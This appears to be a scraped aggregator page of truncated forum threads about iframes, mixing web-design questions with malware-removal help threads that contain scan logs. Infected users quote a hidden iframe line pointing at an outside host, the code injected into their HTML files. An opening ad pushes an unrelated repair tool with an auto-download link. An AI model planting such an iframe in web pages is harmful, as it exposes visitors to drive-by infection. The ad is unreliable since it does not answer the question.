Over 1 million tech questions and answers.

IFrame Problems

Q: IFrame Problems

I have a page index.shtml, and there is an iframe in that page. The iframe is called downloadiframe. Now I have a button in my forums that I want to link to my downloads page.

Here's My problem. When you click the "download" button on my page, you go into my downloads page. But I want it to open index.shtml with the downloads page in the iframe, downloadsiframe. How do I do this?

Preferred Solution: IFrame Problems

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

A: IFrame Problems

Read other 8 answers

Hi Guys,

I have a problem with my computer.
looks i have a virus/malware inside my computer. I have to try to restore using system restore, seems i doesn't work.

This kind of <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> infected all of my HTML/PHP/ASPX files in my computer.
I had to try to delete it using notepad, but when i open it again. it still there.

Can sombody please help me, cause i still had a lot of work must be finished monday, and i can't continue to work if my computer still behave like this.

Here is log file using DDS i created to you guys. Thanks for your help

A:<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

Read other 2 answers

Ok I've got an iFrame on website and I want a link to open a new browser window from the page in the iFrame when it's clicked on so it doesn't take you away from the site.

_blank loads the entire page in the iFrame
_parent opens the entire page in the browser window that I don't want the person to be taken away from...

HELP!! It does this in both IE and Mozilla Firefox...

This one has me totally stumped!

A:Solved: iFrame problems

I belive "_new" should work.

Read other 2 answers

Just recently I have have major issues with IE7: I get many errors messages "Internet explorer cannot display web page" At times partial page loads and the Iframes have dns errors and display with the same messages. I also cannot get into one of my online banking sites. And many sites display lilke this.I have verified 128-bit encryption, deleted temp files, configured security settings for trusted sites, cleared SSL state and auto complete hx, configured SSl 2.0 and 3.0, verified time and date, gone through all of microsofts kb bulletins and fixes with the exception of re-installing/repairing xp, checked my host files for infection/corruption, flushed my dns, scanned for nasties with Malewarebytes, Bitdefinder, AVG, Kapersky, Trendmicro housecall, Windows Live Care and Lavasoft.I am now wondering if some of my winsock files are corrupt, I am not sure how many entries there should be or if some other problem exists. I even tried upgrading to IE8 but it did not help. This did not start untl I started the ATT dsl service.Any advice??Thanx,Theresa

A:IE 7 problems: Partial page loads, iframe, dns errors

Have you tried using an alternate browser such as FireFox?

Read other 3 answers

Scan is at 9% and it has found 6317 problems/viruses.I already posted a bunch of stuff at Geekstogo.They recommended I give up and format my hard drive.http://www.geekstogo.com/forum/Freezing-BS...ng-t247274.htmlI'll get the dds and rootrepeal logs up as soon as I have finished the non windows methods.I've got Klam anti-virus running.I'm gonna try to see if I can run the Avira rescue linux CD from a USB flash drive. (I'll resort to burning a CD if I must)I'm gonna take a look at some Boot Record stuff with boot wizard and NTFS4dos.I don't know if anyone has any ideas about partition weirdness,but I have a flash boot of Ubuntu 9.04 live and when I took a look at the partition tables with fdisk in the terminal;Both my flash drives had all 4 partition tables filled with incorrect info.When I booted back off the hard drive and took another look the table info was ok.Single partition entries as it should be.<PRE>[email protected]:~$ sudo fdisk /dev/sddCommand (m for help): pDisk /dev/sdd: 8015 MB, 8015282176 bytes255 heads, 63 sectors/track, 974 cylindersUnits = cylinders of 16065 * 512 = 8225280 bytesDisk identifier: 0x0000000a Device Boot Start End Blocks Id System/dev/sdd4 * 1 974 7823623+ 6 [email protected]ubuntu-9-04:~$ sudo fdisk /dev/sdeCommand (m for help): pDisk /dev/sde: 4194 MB, 4194304000 bytes255 heads, 63 sectors/track, 509 cylindersUnits = cylinders of... Read more

A:IFrame.Trojan virut.vitro Neeris.worm Partition problems MBR help

Hello winst0n. I'm sorry to tell you this, but the people over at Geeks to Go! are right. I think no malware helper would bother cleaning this infection as trying to do so would be a waste of time. Please read the following.Virut is a polymorphic file infector with IRCBot functionality which infects .exe, .scr files, downloads more malicious files to your system, and opens a back door that compromises your computer. According to this Norman White Paper Assessment of W32/Virut, some variants can infect the HOSTS file and block access to security related web sites. Virux is an even more complex file infector which can embed an iframe into the body of web-related files and infect script files (.php, .asp, and .html). When Virut creates infected files, it also creates non-functional files that are corrupted beyond repair. In many cases the infected files cannot be disinfected properly by your antivirus. When disinfection is attempted, the files become corrupted and the system may become irreparable.The virus has a number of bugs in its code, and as a result it may misinfect a proportion of executable files [..] some W32/Virut.h infections are corrupted beyond repair.REFERENCE: McAfee Risk Assessment and Overview of W32/VirutThere are bugs in the viral code. When the virus produces infected files, it also creates non-functional files that also contain the virus [..] Due to the damaged caused to files by virut it's possible to find repaired but corrupted files. They became corr... Read more

Read other 4 answers
Q: iframe

How do clear the iframe in netscape 7.0 and Internet explorer. The following code works in IE but not in netscape

<title>Simple Math Practice</title>

<script language="javascript" type="text/javascript">
<!-- Hide Script
function RandPosInt() {
Rnum = Math.round(Math.random()*8+1);
return Rnum;

function WriteHeader() {
problem.document.write('<html><head><link href="math.css" rel="stylesheet" type="text/css"><\/head><body>');

function WriteContent() {
problem.document.write("this is content");

function WriteFooter() {

function ClearFrame() {

function CloseFrame() {

// End Hiding Script -->

<link href="math.css" rel="stylesheet" type="text/css">
<div align="center">
<h1>Simple Math Practice</h1>

src="defaultframe.html" id="problem" name="problem" frameborder="1" marginwidth="10" marginheight="10" scrolling="no" align="top" height="200" width=&quo... Read more


That function is no longer supported. See here:

Read other 1 answers

Still I frame. I have an Iframe on my site and I wanted to show only a certain part of the site inside it and unscrolable too. Can I tell the browser(s) to do this? and how. Please help.

A:Still Iframe - Please Help

Read other 12 answers

I am working on a site using an IFrame. It is a copy of another site I have using the same IFrame. In the original site the homepage shows up on load but on the reworked site it loads the home page and then it disappears. I am using IE to view these pages.

A friend said he looked at the site in FireFox and it works correctly, so it leads me to believe it may be an IE thing but the original site works fine in IE.

I am out of ideas here. HELP!

A:IFrame help

post the sites url and I will check out the code....... if I can see it.


Read other 2 answers

I already ran ComboFix before I found the preparation guide saying not to unless instructed - oops.

Iframe.inf infected my sites at Hostgator which they cleaed up overnight. I'm impressed.

Hostgator tech suggested scanning local system using multiple scanners for better results. I use Avast Internet Security and it reported no problems.

Is ComboFix log is enough to tell if infected or do I need to go through all the stuff listed in prep guide.

thanks in advance for any help you can render

ComboFix log below

ComboFix 11-03-11.02 - STAN 03/12/2011 16:09:45.3.1 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.544 [GMT -5:00]
Running from: c:\downloads\Software\ComboFix.exe
AV: avast! Internet Security *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Disabled* {7591DB91-41F0-48A3-B128-1A293FD8233D}
* Created a new restore point
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\~DFK69783e.tmp
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\1eaadjc.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\bass.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\engine_vx.dll
c:\doc... Read more

A:Iframe.inf infected - yes or no?

Hello and welcome to Bleeping Computer We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. Please take note: If you have since resolved the original problem you were having, we would appreciate you letting us know. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
If you are unsure about any of these characteristics just post what you can and we will guide you.Please tell us if you have your original Windows CD/DVD available. If you are unable to perform the steps we have recommended please try one more time and if unsuccessful alert us of such and we will design an alternate means of obtaining the necessary information. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far. Upon completing the steps below another staff member will review your topic and do their best to resolve your issues. If you have already posted a DDS log, please do so again, as your situation may have changed. Use the '... Read more

Read other 3 answers

Hi Folks,From threatpost :New Firefox iFrame Bug Bypasses URL Protections. http://bit.ly/as6VH9CheersKarstenHansen

Read other answers

Description of my problem:We determine in our local network an instability, this is due to spread of malware through in it.The malware uses the method of attack based ARP to the local network Gateway ( machine "A" owner of the MAC address "MacA" send packages ARP broadcast on the network indicating that the bridge is the machine A ( right address of Gateway) is at "MacA"), so many machines in our network used a wrong ARP i(I mean MACA of infected machines by this malware)After a long check on them to identify this malware. we found : these machines were infected by:svchost.exe" (175 KO, 179200 Bytes) uses the DLL Packet.dll and wpcap.dll and wanpacket.dll ... \ drivers \ npf.sys.- There realize a scan of all networks 192.168- and 172.16- and 10.0-- It has a "80-port insert" in the svchost paquet-at last we have another problem; when we open web page (as IE or Firefox) before we get the response and taking two or three seconds, the page displays a little gray bare (even we use windows or Linux system) and the view page source return this hxxp:// and this are included in the svchost.exe paquet but it was crypted.- Can somebody help me and explain me haw can we resolve this and clean our local network from this malwre? Thank's in advance

A:Iframe And Arp Spoofing

Please can somebody help me, nobody has an idea about this problem ?

Read other 4 answers

Alright here the deal i have a transparent iframe with the content visable but the scrollbars are transparent and i dont want that...so is there anyway to have a transparent iframe with visable content and visable scrollbars?

A:Transparent iFRAME

Read other 12 answers

OS: Server 2008 R2 - SP1

IIS: 7.5.7600.16385

I have an iframe embedded into a web page which displays a pdf.  In chrome and other browsers the pdf displays fine inside the iframe; however, in IE the iframe forces a logout after redirecting them several times.  Chrome also does this redirect
but doesn?t end up forcing a logout.  Copying the source url from the iframe into a new tab in IE doesn?t force the logout and retrieves the pdf just fine which means it is directly related to this server?s handling of iframes specifically in all IE browsers
we support (IE 9+).  This scenario is unique to a specific server and doesn?t happen on ?identical? server environments.

I have used Process Monitor and am not seeing any permission errors or anything that immediately stands out.  If you have any thoughts on how to proceed or have any questions, please let me know.
I have also looked into KB 3154070 without success.

Read other answers

I receive frequent emails from my friend's infected computer with random subject lines and random names with his files as an attachment.

Now, the problem is my AVG antivirus and Housecall do not detect any virus in these emails, but pandaactivescan detects this as "Exploit/iFrame".

I have XP pro, IE6 and Outlook express6 and have even installed the patch for this vulnerability that actually affects IE5.5 and IE5.01 only(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp).

IS my computer infected?


Read other 9 answers

I have searched posts here for other virus help and have downloaded the Malwarebytes that was suggested and will put copy on the infected computer. I have run my Avast Antivirus and the OneCare but still have problems.QUESTIONS:1-Does this Malwarebytes program have any problems with other Antivirus progams running?2-Will this program get rid of the iframe virus? 3-I noticed a strange program in my msconfig StartUp it was named freddy42 I have disabled it. I have checked and now know it is part of this virus. 4-Should I have diabled freddy 42? I think that is why I may be still infected.5-Do I need to have all programs enabled in my StartUp to ensure complete virus removal.6- Can the infected computer infect laptop, it is on shared network? I have disabled all sharing folders and files with infected computer.I took a picture of the message as it is loading the bogus page. It says: waiting for res://ieframe.dll/dnserrror.htm. I can't log on anywhere to get more info or help so I am using my laptop now to get work done....

A:IFrame Virus

In answer to question onePrograms that monitor and prevent registry changes such as Spybot S&D Teatimer function and Winpatrol need to be disabledIn answer to number two post a log and we'll take it from thereDisable freddy42 using Autorunshttp://technet.microsoft.com/en-us/sysinte...s/bb963902.aspxNumber 5 - noNumber 6 - yesAre you using a digital picture frame? Whatever USB attachment it is, do not use it right nowI'm moving this to AII-----------------------------------------------------The process of cleaning your computer may require you to temporarily disable some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-... Read more

Read other 6 answers

Avast antivirus is reporting that a number of files have been infected with a trojan called "IFrame-HW [Trj]". It seems to move around to different files, I use Windows Vista and some of the files infected are in hidden folders which I can no longer seem to access. Also, when I tell Avast to move the files to it's chest or to delete they just seem to come right back, sometimes immediately. I'm not sure what effect it is having on my pc, except Mozilla Firefox will no longer function on my pc, I can only browse the net with IE or Opera.
I have also tried using Cyberscrub to clear my free space after deleting infected files, but when I do so I get constant reports of the infection from Avast and Cyberscrub stops responding.
Any help will be greatly appreciated.
DDS (Ver_09-06-26.01) - NTFSx86
Run by olusanya at 16:37:47.03 on Thu 07/09/2009
Internet Explorer: 8.0.6001.18783
Microsoft? Windows Vista™ Home Premium 6.0.6001.1.1252.1.1033.18.2814.1528 [GMT -4:00]

SP: Spybot - Search and Destroy *disabled* (Updated) {ED588FAF-1B8F-43B4-ACA8-8E3C85DADBE9}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32... Read more

A:Infected with IFrame-HW [Trj]

Pardon me... I left out the fact that it also seems to have disabled the protective mode of IE, leaving it vulnerable.Hello nu2cpu,We ask that once you have posted your log and are waiting, please DO NOT "bump" your thread or make further replies until it has been responded to by a member of the HJT Team. The reason we ask this or do not respond to your requests is because that would remove you from the active queue that Techs and Staff have access to. The malware staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response, there will be 1 reply. A team member, looking for a new log to work may assume another HJT Team member is already assisting you and not open the thread to respond.That is why I have made an edit to your last post, instead of a reply. Please do not multiple post here, as that only pushes you further down the queue and causes confusion to the staff.Please be patient. It may take a while to get a response but your log will be reviewed and answered as soon as possible.Thank you for understanding.Regards,The weatherman (Moderator)

Read other 3 answers

My PC was working very well and had no problem. I turned off after my work one night and when I switched on the next morning it does not open my home page. When I try to open my antivirus Avast gives me warning. The name of the virus is HTML:Iframe-inf Please help me to get rid of this. I am not able to ope my home Page.
More over my system has become very slow especially during the start up. Please help.
Thank you!

Read other answers

On my site, I have darkish colors; blue, grayish-black, etc. But I have an IFRAME of a page from another site, which has white background and black text, so it doesnt fit in with my page. I already have the CSS for my page colors, can I apply this to the Iframe, or is there another way I can change its background color?

Since the Iframed page is on someone else's site, I can not modify that file itself. And many of you will probably tell me an iframe is not good to use in page design, I have decided its the best way to accomplish what I want.

A:Formatting an IFRAME

if you know this person and they're okay with you mirroring their site, you could ask them to use DIV id's and SPAN id's and set their tags to CSS id's that you know of, then name your CSS id's the same. you'd have to put a LINK REL tag in the HEAD and both you and the person who owns the site would need to have it point to CSS in the main directory with the same file name. everything would have to correlate.

Read other 2 answers

ok.... so what i want to do is have an iframe over top of an image (which i have figured out), but then, i want that iframe to have a lower opacity so that you can kind of see the picture that the iframe is over top of. i've read a ton of stuff about transparency and opacity and i've tried a few different things, none seem to work though. i've been able to change the opacity of the iframe fine, but rather than having my image come through, the bg color (which is black) comes through.

please help and thanks in advance


ps - think of it like a layer in photoshop where you can just change the opacity to have the layer behind it show through.

A:Need help with iframe opacity...

well I am not too sure, but I think you would have to change the alpha opacity in the code for the page within the iframe. So if your iframe is linkted to "pagename.htm" then you have to use alpha opacity on the "pagename.htm" page, as opposed to the page including the iframe. However, I may be way off track on this one! This is all I can offer is an idea...

Read other 2 answers

I work on portals. In ePhox editLive editor I am using iFrame which in turns diplay a intranet site with in this iFrame. This site includes a selectbox for locations. When site is displyaed first time select box is not visible to end user but when we click on any button and this page again renders this select box is also available.
I right click on site when select doesnt appears but for my surprize code for select box is there in view source. I am not getting why it is not visible if code is there in view source.
Also, When I open this site in internet explorer without any iframe select box is visible there.

Can anyone please help why it is happening like that??

Rohit Sharma

Read other answers

I m tired of searching about iframe alternative ..... after so much search i cant get what i wanted .

I m trying to include other domain HTML page in my HTML based email templates, Is there any other way to include the html pages from other domain in my HTML coding that is other than iframe?

Read other answers

In the last week, my computer has started having issues and restarting randomly.  When I try to maximize some videos on youtube, occasionally the video will only cover 1/3 of the screen and immediately freeze.  Avast said everything was good, but I tried a boot scan anyway; it would pop up and identify some infected files, but when I told it to fix them, it would say those files are no longer there.  I can't find the text file that avast apparently made, but I do remember clickjacker and a frame flashing across the screen.  I'd appreciate any help you could give in clearing this up.  
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.9600.16518  BrowserJavaVersion: 10.51.2
Run by Josh at 0:33:52 on 2014-02-23
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.16382.14153 [GMT -6:00]
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
============== Running Processes ===============
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\W... Read more

A:Iframe, clickjacker?

Hi Fajen
My name is polskamachina and I will be assisting you with your malware problems. What follows below are some ground rules for this forum.
I will reply as soon as possible (typically within 24-48 hours). In turn, I ask that you please respond within 72 hours. If you know you will be away longer than that, please let me know.
I am in California at GMT-8 Hours (Pacific Standard Time). If I do not respond to you within 48 hours, feel free to send me a private message.
Some points for you to keep in mind:
Do NOT run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
Do not attach logs or use code boxes, just copy and paste the text.
I cannot see your computer. Periodically update me on the condition of your computer, and provide as much detail as you can in every post.
Once things seem to be working again, please do not abandon the thread. I will give an "all-clean" message at the very end.
NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planned. You can put them on a CD/DVD, external drive or a flash drive, anywhere except on the computer.
NOTE: It is good practice to copy and paste the instructions into notepad and print them in ca... Read more

Read other 22 answers

I have just had 3 securtiy alert messages from AVIRA,don't know if it would have any connection :
C:\users\XXXX\AppData\Local\Microsoft\...\b(1).js contains suspiscious code HEUR/HTML. malware, the same version b(2)
and detection pattern of the java script virus JS/Dldr.Iframe.BO
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:04:02, on 22/06/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Windows Live\Family Safety\fssui.exe
C:\Program Files\TalkTalk\bin\sprtcmd.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Common Files\Nero\Lib\NMBgMonitor.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
C:\Windows\System32\rundl... Read more


Read other 6 answers

on my site i have a link i use for users to view tax records in my county and i would like to have the users not leave my site,so i used an iframe,but im havin an issue after agreeing to their usage terms,users cannot access the site or it doesnt redirect to the corresponding/next page,as in enter here and i cant bypass it because it will auto redirect. any suggestions WITHOUT using a new page or opening in a new window ??


oh and take it easy on me...im new

A:iframe or equal...

Read other 16 answers

Hello Gracious Help,I run XP Pro on a Pentium 4, 3ghz (Dell GX270).3 days ago, I had my Firefox browser open, but had not used it or been at the puter for about 5 hours. When I sat down at the puter, there were perhaps 10 Avast warning pop-ups within about 15 mins - that said that it had blocked me from opening a malicious site. The trouble was, I was not trying to open any sites at this time. Two of the sites it specified were a beastiality site and a zoo site - neither of which I have ever been to.Avast seemed to block my browser from opening these sites, but my question is - what was directing my browser to go to them in the first place? The Avast warning said that the virus (or malware) that it was protecting me from was HTML:Iframe-infA web search came up with a few complex suggestions on how to rid of fix this problem, but all were too complex for me to follow.The hijacking or redirecting (or whatever it was) has not happened again since. I have had no further Avast warnings over the last 2 days. I first looked for help from the Avast website, and spoke to an IYogi support rep on the phone (whose number I got from the Avast website). He took remote control of my puter, checked my registry and said he could help if I bought a $186.00 support pkge (that provided support for 6 months). In retrospect, the "Help for Avast Free" phone number is just a marketing ploy to sell support packages. I just hope the guy did not add spyware or key loggers (or such... Read more

A:HTML : Iframe - inf

Hello again,

Today I had the same problem again. When Avast kept giving me warnings and notifications that it has protected me from going onto malicious websites (even when I wasn't surfing), I pushed "More Info" button on the Avast pop-up, which took me to the Avast webpages that explained more about the infection (and attempted browser hijackings or re-direction, or whatever it is).

I did this for two Avast warning pop-ups (that tried to take me to two different malicious sites). Below are the URL's to the two Avast webpages that opened, when I clicked the "more info" button on the warning pop-up:

hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComO... Read more

Read other 41 answers

I have Exploit-IFrame trojan on my machine.
I only enocunter it when going to my own websites.
McAfee finds it and deletes it and shows me its location, I follow it and do not see the offending trojan, and the suffix changes each time it is found and cleaned both on the AOL and I.E. browsers.
I have run Ad-Aware SE Personal, AVG 7.5, and a complete McAfee scan - nothing found.

Step 1. None of the Malware listed, or Rogue programs exist on this machine.

Step 2. Run Panda ActiveScan.

Step 3. Downloaded and Installed Spyware Blaster from Desktop.

Step 4. I have SP 1 and 2 installed already.

Step 5. Downloaded Deckard's Systen Scanner to Desktop

Panda Activescan

Incident Status Location

Adware:adware/ncase Not disinfected c:\temp\FLEOK
Adware:adware/sidesearch ... Read more

A:Exploit-IFrame trojan

dss.exe encountered a problem and had to close

Read other 2 answers

Well my site runs on IFrames, and now I want to submit my tutorials to certain websites. However, they say I can only submit the actual URL leading to that tutorial.

So my questions is, is there any I can make a link so it goes to website (with the layout) AND the exact IFrame? Something like www.mysite.com/outer_layout.php#actualiframe.php (I realize that doesn't work but you know what I mean.)


Read other answers

I am using an iframe for calling other websites. I want to disable right click in this Iframe. Can anybody help me out in this.

A:Help! To disable right click in Iframe

It'll only work for people using IE and I think you'd have to disable it for the whole page and not just the iframe. Plus the IE user would have to have Javascript turned on for it to even work.

Other browsers have options to block you from doing evil stuff like that.

Also, keep in mind that for security reasons, browsers are very picky with what you can do with an iframe if the site loaded in it is not on the same server/domain as the page.

Read other 1 answers

I am running Windows XP Home Edition SP3 and while clicking on a link trying to find the lyrics to a certain song last night, Avast alerted me to a Virus/Worm. It went through the whole routine of freezing everything up and not being able to close the windows, but eventually I instructed Avast to delete it. I then did a full Avast scan in safe mode and everything was clean except for this one line:Name Of FileC:\Documents and Settings\Sean\Local Settings\Temporary Internet Files\Content.IE5\SEIGLIUM\search[1].htmResultInfection: HTML:Iframe-inf (it could be lframe-inf but I couldn't tell from the readout)Is this anything to worry about? Is it safe to assume that since it was in the Temporary Internet Files folder for IE5 and not in a System folder then it's not that much of a threat? Since I'm running IE7, do I even need any IE5 files? Couldn't I just delete the entire IE5 content folder?Today, I did another half a dozen full scans in safe mode with Malewarebytes' Anti-Malware, SUPERAntiSpyware, Spybot S&D, SpywareBlaster, a-squared, RogueRemover, etc. and they all came up clean. Please advise me of anything else I can do that might help.I am going to run another full Avast scan tonight in safe mode just to be sure that it's completely gone. Also, I notice that when I run Avast in safe mode it says, "Resident Protection: Disabled" - is this normal? It's usually set to either Normal or Custom dependin... Read more

A:Infection: HTML:Iframe-inf

Please print out and follow these instructions: "How to use SDFix". When using this tool, you must use the Administrator's account or an account with "Administrative rights"Disconnect from the Internet and temporarily disable your anti-virus, script blocking and any real time protection programs before performing a scan.When done, the SDFix report log will open in notepad and automatically be saved in the SDFix folder as Report.txt.If SDFix is unable to run after rebooting from Safe Mode, run SDFix in either Mode, and type F, then press Enter for it to finish the final stage and produce the report.Please copy and paste the contents of Report.txt in your next reply.Be sure to renable you anti-virus and and other security programs before connecting to the Internet.-- If the computer has been infected with the VirusAlert! malware warning from the clock and the Start Menu icons or drives are not visible, open the SDFix folder, right-click on either the XP_VirusAlert_Repair.inf or W2K VirusAlert_Repair.inf (depending on your version of Windows) and select Install from the Context menu. Then reboot to apply the changes.

Read other 3 answers

I have a laptop running windows 7, eset security ver 4 and malwarebytes.
I ran a computer scan with eset and got the message saying I was infected with this virus and gave 2 different paths. It didn't give me the option to clean, only delete and do nothing. So I deleted the files, but they keep coming back. I'm not at my computer to send a screenshot.
Please let me know what I need to do to start the process of getting this virus out of my laptop, it's driving me nuts!

A:Infected with HTML/Iframe.B.Gen

Hello danny reboot into Safe Mode with Networking... Empty your temp folders using TFC (Temporary File Cleaner)
[list]Please download TFC by Old Timer and save it to your desktop.
alternate download linkSave any unsaved work. (TFC will close ALL open programs including your browser!)Double-click on TFC.exe to run it. (If you are using Vista, right-click on the file and choose "Run As Administrator".)Click the Start button to begin the cleaning process and let it run uninterrupted to completion.Important! If TFC prompts you to reboot, please do so immediately. If not prompted, manually reboot the machine anyway allowing Windows to load normally (not into Safe Mode) to ensure a complete clean.Run ESET again.

Read other 9 answers

Offending site recorded it is hxttp://www.visitcouns.com
The HTMLIframe-inf is a bad one and only blockers are available from your
antvirus program if they have made one! Ruining everyones internet experience and jumping on legitimate sites. It's tragic! Hardly wait for the final fix
to be in at msupdate so called patched version of firefox has not worked out
virus has mutated! Times for most likely attacks in North America are early
morning. Any help would be appreciated.

A:re:iframe drive by virus

Yeah it's mr-toad again with something to add re:the iframe threat.
If you signed up for a my space account and didn't make it private you
should have. I didn't and paid the price. I suspect that it all stemmed from
there finally got pissed off dismantled the site, after making it private! Closed the account; it's now early morning and no attacks thus far. If you use IMs keep your contacts only for people you really!!!! know. I trashed my IMs because there a royal pain in the butt. I'll be keeping up to date with a thumbs up or thumbs down. Hope this helps someone.

They call me mr-toad. cheers everyone

Read other 2 answers

Hello,Two days ago AVG?s resident shield announced a chura virus when opening Firefox. I searched and found the line <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> in a HTML file just before the body closing tag. I made a search with Vista search (very slow) and found 59 HTML files with the same code on the same place. I scanned the computer with AVG and then with Anti-Malware, Ad-Aware and SUPERAntiSpyware. No way, they found just a few small problems that were taken care of. I removed that line of code from all files, but when I made another search there were over 150 infected files. I repeated the cycle (search, clean the files by hand, AVG and the others). This time AV and AS found nothing! I made a third search and now there were nearly 2000 infected HTML files. I can?t clean so many files by hand, and from the previous experiences it was worthless because all the files I had cleaned were infected again.I have a site and its files on my computer are now infected. I cannot access the site because I am sure to spread the virus all over and also distribute the virus to whoever visits. Not better is the fact that I save many files in HTML because I find it practical, so I have many HTML files. Even worse is that the infection is not on the start up HD with the OS where I could just reformat and reinstall or replace with a saved image, but on another HD where I have all my files and the site files. The C: disk has only ... Read more

A:<iframe> chura virus

Hello Straydog,In checking web references on the type of infection you posted here I see, as you probably have, a trail of discussions going back to perhaps March, and few with any direct confirmation of the infection sources, or complete solutions. However, in some of that web info I see references to "Virto" which is a form of the Virut file infector malware (see here). Virto/Virut injects it's code into all of certain file types on systems, and is so pervasive and elusive in activities that the only best option for a solution is to reformat and reinstall, and all without saving any personal data from the system. If I were a site owner (and I am) and knew my system was infected with such a virulent malware (which has happened to one of my systems), I would reformat and reinstall, and regroup after as far as how to return needed settings and softwares etc. We can do some scan/checks here to see what all still needs cleaning, but up front, should there be any verification of Virto involvement I will end all assistance, with the correct suggestion of that reformat/reinstall solution.For the website, send me via PM the site name, so I can evaluate it's current status. Plan to only access that site from some other computer that is known to be malware free, and also has not been used before to access the site's web program (such as cPanel). From a different computer right now, change all control panel/site passwords. You can assume the site's security has been compromis... Read more

Read other 7 answers

Oops! Wrong subject. I found that on my machine, not on this one.

My dear sweet son neglected to tell me he was having problems on his computer. His Yahoo massenger has suddenly begun malfunctioning throwing a scripting error in every session, refusing to close, then having to boot each session. It now will not start without a boot. He received a video link from a friend (teens, yeah) that took him to an anime site. After viewing the harmless video that came in, it began redirecting to adult videos. My husband uses this computer as well and has never run AV on it, so my son disregarded my instruction that he needed to download and install AV. Below is his HJT log file

